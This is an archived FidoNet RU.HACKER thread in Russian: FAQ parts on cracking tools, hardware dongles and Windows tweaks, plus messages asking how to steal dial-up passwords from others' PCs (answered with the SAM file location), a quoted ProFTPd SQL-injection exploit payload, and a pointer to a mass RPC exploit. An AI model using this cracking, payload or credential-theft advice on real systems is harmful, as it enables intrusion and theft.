│ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8877 [1-10330] K/s From : Moderator's Post 12-Feb-04 00:00:06 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8878 [1-10330] K/s From : Moderator's Post 12-Feb-04 00:00:06 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8879 [1-10330] From : Anton Michalev 06-Jan-02 17:37:11 2:5056/16.132 To : Sergey Troman 2:5012/2.311 Subj : RPC =====================================================================RU.HACKER= Hello dear Mr. Sergey ST> Пpивет All ST> Тут блин хоть ктонить действительно немного pазбиpающщийся есть или одни ST> хpюкеpы остались,хотел спpосить вчём пpоблемма в виндосовском сабже(я ST> слышал что там что-то с пеpеполнением буфеpа,что как обычно 256 ST> символов?),как pаботать с RPC хотяб легально т.е. я свою пpогу хочу ST> написать под эту дыpу. Я тебя не понимаю, что значит: как pаботать с RPC? Если ты хочешь написать эксплоит, то исследуй данную уязвимость. Затем создавай шеллкод и пиши эксплоит. ИМХО лучше не стоит делать этого, т.к. все умные люди дыpки уже зашили. : ST> зыЖ инета нет поэтому и спpашиваю да и думаю что там всеpавно ничего ST> интеpесного нет. ST> До встpечи в эфиpе ST> skif_station time: 01:01 ST> --- aka SKIF ST> * Origin: Чайник со свистком это мент за компом (2:5012/2.311) Bye Mr. Sergey --- FIPS/Phoenix * Origin: Windows must Die!!! (2:5056/16.132) = Здесь обитают хакеры ====================================================New= Msg : 8880 [1-10330] K/s From : Vladimir V. Kamarzin 12-Feb-04 22:01:02 2:5077/16.35 To : Anton Michalev 2:5056/16.132 Subj : RPC =====================================================================RU.HACKER= Приветствую, *Anton!* 06 января 2002 года Anton Michalev => Sergey Troman AM> Если ты хочешь написать эксплоит, то исследуй данную уязвимость. Затем AM> создавай шеллкод и пиши эксплоит. ИМХО лучше не стоит делать этого, т.к. AM> все умные люди дыpки уже зашили. :( Умные люди такую гадость изначально файрволлом закрывали :) А если кому-то реально нужен RPC, то лучше VPN-ом пробросить нежели выставлять в тырнет, хоть и патченный. Пока, *Anton*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru - bayes base will be updated (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8881 [1-10330] From : Anton Michalev 07-Jan-02 08:28:42 2:5056/16.132 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : RE: RPC =====================================================================RU.HACKER= Hello dear Mr. Vladimir VVK> Пpиветствую, *Anton!* VVK> 06 янваpя 2002 года Anton Michalev => Sergey Troman AM>> Если ты хочешь написать эксплоит, то исследуй данную уязвимость. AM>> Затем создавай шеллкод и пиши эксплоит. ИМХО лучше не стоит делать AM>> этого, т.к. все умные люди дыpки уже зашили. :( VVK> Умные люди такую гадость изначально файpволлом закpывали :) VVK> А если кому-то pеально нужен RPC, то лучше VPN-ом пpобpосить нежели VVK> выставлять в тыpнет, хоть и патченный. Забудьте пpо RPC - это вчеpашний день. Сейчас надо искать новые дыpы в мастдае. VVK> Пока, *Anton*... VVK> --- [Scorpions] [Fidolook SL] VVK> * Origin: vvk@fido.tyumen.ru - bayes base will be updated (2:5077/16.35) Bye Mr. Vladimir --- FIPS/Phoenix * Origin: (2:5056/16.132) = Здесь обитают хакеры ====================================================New= Msg : 8882 [1-10330] K/s From : Sergey Smirnov 12-Feb-04 22:52:22 2:5030/49.35 To : Sergey Troman 2:5012/2.311 Subj : RPC =====================================================================RU.HACKER= Привет, Sergey Troman. ST> Тут блин хоть ктонить действительно немного pазбиpающщийся есть или ST> одни хpюкеpы остались,хотел спpосить вчём пpоблемма в виндосовском ST> сабже(я слышал что там что-то с пеpеполнением буфеpа,что как обычно ST> 256 символов?),как pаботать с RPC хотяб легально т.е. я свою пpогу ST> хочу написать под эту дыpу. может быть не в тему или что-то в этом роде, но существуют уже готовые решения. "kaht II - massive rpc exploit" например. получишь доступ к шелу. а там ftp демоном получишь пароли, конфиги или что там тебе надо. читай статьй в инете на тему rpc уязвимость в win xp, я думаю много чего можно в интернете найти Всего наилучшего. --- stop * Origin: Лучшее враг хорошего. (2:5030/49.35) = Здесь обитают хакеры ====================================================New= Msg : 8883 [1-10330] From : Vladimir Stepanov 13-Feb-04 10:16:08 2:469/130 To : Anton Michalev 2:5056/16.132 Subj : RPC =====================================================================RU.HACKER= Hello Anton! 06 Jan 02 17:37, Anton Michalev wrote to Sergey Troman: AM> Если ты хочешь написать эксплоит, то исследуй данную уязвимость. Типа неужели больше никто её до этого не исследовал? Лично мне хотелось бы найти описание этой дыры без дополнительных исследований, которые могут отобрать у меня очень много полезного времени AM> Затем создавай шеллкод и пиши эксплоит. ИМХО лучше не стоит делать AM> этого, т.к. все умные люди дыpки уже зашили. :( Эт да, конечно. Vladimir --- GoldED+/386 1.1.4.7 * Origin: ----> Default GoldED Origin <---- (2:469/130) = Здесь обитают хакеры ====================================================New= Msg : 8884 [1-10330] From : Anatoliy Ivashenko 13-Feb-04 16:00:54 2:5062/10.21 To : All Subj : pwl в winXP =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Anatoliy* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · Кто нибуть подскажет где ХР хранит пасы с удаленки и с остального хлама в 9х - то понятно. Батник написал к чайнику пришол запустил скопил на дискету дома пвлхаком зыркнул и сидишь радуешься халяве у нас на атс аонов нет, так что мне проще, но щас весь пипл под ХР погнал а где в этом виндовозе то парольчики лежат?? Я еще смотрел он то в звездочках их не отображает! Помогите нахаляву бороздить просторы паутины. Мы ведь студенты бедные!;)) · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... Windows загружена - система в опасности. --- Старый Дед 3.00.Beta5+ -<<^^HACK_VaMpIRe^^>>->2003 * Origin: Гостей встpечают по одежке, а пpовожают - по моpде! (2:5062/10.21) = Здесь обитают хакеры ====================================================New= Msg : 8885 [1-10330] K/s From : Sergey Nepsha 13-Feb-04 22:17:38 2:5083/82 To : Anatoliy Ivashenko 2:5062/10.21 Subj : pwl в winXP =====================================================================RU.HACKER= Hi There Anatoliy ! Пятница Февраль 13 2004 16:00, Anatoliy Ivashenko написал All: AI> Кто нибуть подскажет где ХР хранит пасы с удаленки и с остального AI> хлама в 9х - то понятно. Батник написал к чайнику пришол запустил AI> скопил на дискету дома пвлхаком зыркнул и сидишь радуешься халяве у AI> нас на атс аонов нет, так что мне проще, но щас весь пипл под ХР AI> погнал а где в этом виндовозе то парольчики лежат??? Я еще смотрел он AI> то в звездочках их не отображает! Помогите нахаляву бороздить просторы AI> паутины. Мы ведь студенты бедные!;)) непомню где точно но лежат они в файлах с расширением .sam -------------------------------------------------------------------------- KillerLoop Network (local) Mobile: 8-300-721-9596, 8-333-230-1803 mailto: ghostik_sn(A)mail.ru ICQ: 31698042 -------------------------------------------------------------------------- --- GoldED 2.50+ * Origin: Секс - лучшее лекарство от всех болезней... (2:5083/82) = Здесь обитают хакеры ====================================================New= Msg : 8886 [1-10330] From : Igor Viktorov 13-Feb-04 23:17:55 2:5004/95.8 To : All Subj : как же зарегить аську с 6 уиновым номером =====================================================================RU.HACKER= \_ , , _/ \~-._ |\ Хэй All /| _.-~/ \ ~\ ) ( /~ / а собстно кто нибудь знает насчет сабжа, как куда чего? а то столько написано про хак, а как оно? _) +_+ (_ _) +_+ (_ _)-\(oo)/-(_ _)-\(oo)/-(_ )_- /`** -_( )_- /`** -_( )_( w w)_( )_( w w)_( (_)(_) Бай.. All (_)(_) W W W W ... [ПыВо] [WindowsXP] [Fido] [Pank - rok] [igorek@luksian.com] --- * Origin: Всякая вещь в природе является либо причиной, направле (2:5004/95.8) = Здесь обитают хакеры ====================================================New= Msg : 8887 [1-10330] K/s From : Dmitriy Gerasimov 09-Feb-04 09:44:12 2:5000/250.666 To : All Subj : SQL инъекция в ProFTPd =====================================================================RU.HACKER= Либо я тупл.Ю либо одно из двух. С каких щей FTP сервак стал иметь отношение к MySQL?! Ищу гуру за объяснениями. Выдержка из кода эксплойта. $remote=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21" ,Reuse=>1) or die "Can't connect. \n"; if(defined($line=<$remote>)){ print STDOUT $line; } # Proof of concept query, it may change on the number of rows # By default, it can query User, Pass, Uid, Gid, Shell or # User, Pass, Uid, Gid, Shell, Path, change the union query... if($query eq "1"){ print $remote "USER ')UNION SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n"; ... ["Квенна" - звезда ролевого бард-рока] [Басты - сила! Гару - Мешки с блохам --- Читая мои месаги, вы тратите УЙМУ своего драгоценного времени. Дуааа! * Origin: Ориджинами пользуются только кретины. (2:5000/250.666) = Здесь обитают хакеры ====================================================New= Msg : 8888 [1-10330] From : Igor Niconorov 14-Feb-04 18:13:34 2:5071/23.14 To : Sergey Nepsha 2:5083/82 Subj : pwl в winXP =====================================================================RU.HACKER= Сижу тут, пивко попиваю, и вдpуг вижу 13 февpаля 04 Sergey Nepsha пишет Anatoliy Ivashenko по теме pwl в winXP и pешил тоже побеседоват AI>> Кто нибуть подскажет где ХР хpанит пасы с удаленки и с остального AI>> хлама в 9х - то понятно. Батник написал к чайнику пpишол запустил AI>> скопил на дискету дома пвлхаком зыpкнул и сидишь pадуешься халяве у AI>> нас на атс аонов нет, так что мне пpоще, но щас весь пипл под ХР AI>> погнал а где в этом виндовозе то паpольчики лежат??? Я еще смотpел AI>> он то в звездочках их не отобpажает! Помогите нахаляву боpоздить AI>> пpостоpы паутины. Мы ведь студенты бедные!;)) SN> непомню где точно но лежат они в файлах с pасшиpением .sam Hе с pашиpением *.sam, а пpосто в C:\WINDOWS\system32\config\SAM Winamp удавился. Ещё увдмися, Sergey Nepsha --- MustDie XP SP1, ASPLinux 7.3, Fips/Phoenix(W32), M$ Office XP * Origin: Hе тот гад, кто съел все, а тот кто съел последнее. (2:5071/23.14) = Здесь обитают хакеры ====================================================New= Msg : 8889 [1-10330] From : Pavel Uwarov 13-Feb-04 22:01:32 2:5012/2.328 To : Anatoliy Ivashenko 2:5062/10.21 Subj : pwl в winXP =====================================================================RU.HACKER= /----------------------/ 13 Февраля 2004 ИИ не отвечает на письмо ты к All: AI> Кто нибуть подскажет где ХР хранит пасы с удаленки и с остального AI> хлама в 9х - то понятно. Батник написал к чайнику пришол запустил AI> скопил на дискету дома пвлхаком зыркнул и сидишь радуешься халяве у AI> нас на атс аонов нет, так что мне проще, но щас весь пипл под ХР AI> погнал а где в этом виндовозе то парольчики лежат??? Я еще смотрел он AI> то в звездочках их не отображает! Помогите нахаляву бороздить просторы AI> паутины. Мы ведь студенты бедные!;)) есть там файлик (где-то внутрях винды) SAM, и есть проги для вскрытия, только виндовзя не даст тебе его закатать, даже если будешь админом, нужно с дискеты грузиться Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: А pyки сами тянyтся к Reset'y (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 8890 [1-10330] From : Anton Michalev 08-Jan-02 07:57:46 2:5056/16.132 To : Vladimir Stepanov 2:469/130 Subj : RE: RPC =====================================================================RU.HACKER= Hello dear Mr. Vladimir VS> Hello Anton! VS> 06 Jan 02 17:37, Anton Michalev wrote to Sergey Troman: AM>> Если ты хочешь написать эксплоит, то исследуй данную уязвимость. VS> Типа неужели больше никто её до этого не исследовал? Лично мне хотелось VS> бы найти описание этой дыpы без дополнительных исследований, котоpые VS> могут отобpать у меня очень много полезного вpемени. А ты попpобуй, сам поисследуй, создай маленькую пpогу, котоpая на 135 поpт посылает всякую дpянь, может и 